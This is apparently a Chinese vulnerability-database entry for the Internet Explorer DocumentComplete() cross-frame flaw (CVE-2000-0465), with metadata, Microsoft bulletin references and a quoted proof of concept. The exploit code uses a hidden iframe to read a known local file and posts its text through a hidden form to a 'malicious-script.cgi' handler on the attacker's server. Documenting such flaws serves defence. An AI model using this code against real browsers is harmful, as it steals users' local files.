Microsoft IE DocumentComplete()跨帧访问漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1105838 漏洞类型 边界条件错误
发布时间 2000-05-17 更新时间 2005-10-12
CVE编号 CVE-2000-0465 CNNVD-ID CNNVD-200005-068
漏洞平台 Windows CVSS评分 5.1
|漏洞来源
https://www.exploit-db.com/exploits/19939
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200005-068
|漏洞详情
InternetExplorer4.x版本和5.x版本无法正确地验证浏览器窗口中的帧域。远程攻击者借助帧可以读取客户端资料,又称为"FrameDomainVerification"漏洞。
|漏洞EXP
source: http://www.securityfocus.com/bid/1224/info

The DocumentComplete() function in IE does not properly validate origin domains.

Therefore it is possible for a remote webserver to gain read access to local files on the machine of any website visitor or email recipient by accessing the browser object of a frame containing local content. Only files that can be opened by a browser window (eg. *.htm, *.js, *.txt etc) are viewable, and the path and name of the file must be known by the attacker.

Update (May 16, 2001): A new variant of this vulnerability has been discovered. Microsoft has released a new patch to address all known variants of this vulnerability. 

<iframe id=clientContent width=0 height=0 noborder>
</iframe>
<script for=clientContent event="DocumentComplete(browser)">
alert (browser.document.body.innerText);

// browser is an instance of the IWebBrowser COM object

document.forms[0].elements[0].value = browser.document.body.innerText;
document.forms[0].submit ();

</script>

<script>
clientContent.navigate("c:\\known_file.txt")
</script>
<form action="/cgi/malicious-script.cgi" method=post onSubmit="window.alert(document.forms[0].elements[0].value); return
true">
<input name="file_text" type=hidden>
</form>
|参考资料

来源:MS
名称:MS00-033
链接:http://www.microsoft.com/technet/security/bulletin/ms00-033.asp
来源:BID
名称:1224
链接:http://www.securityfocus.com/bid/1224
来源:MSKB
名称:Q255676
链接:http://www.microsoft.com/technet/support/kb.asp?ID=255676
来源:MSKB
名称:Q251108
链接:http://www.microsoft.com/technet/support/kb.asp?ID=251108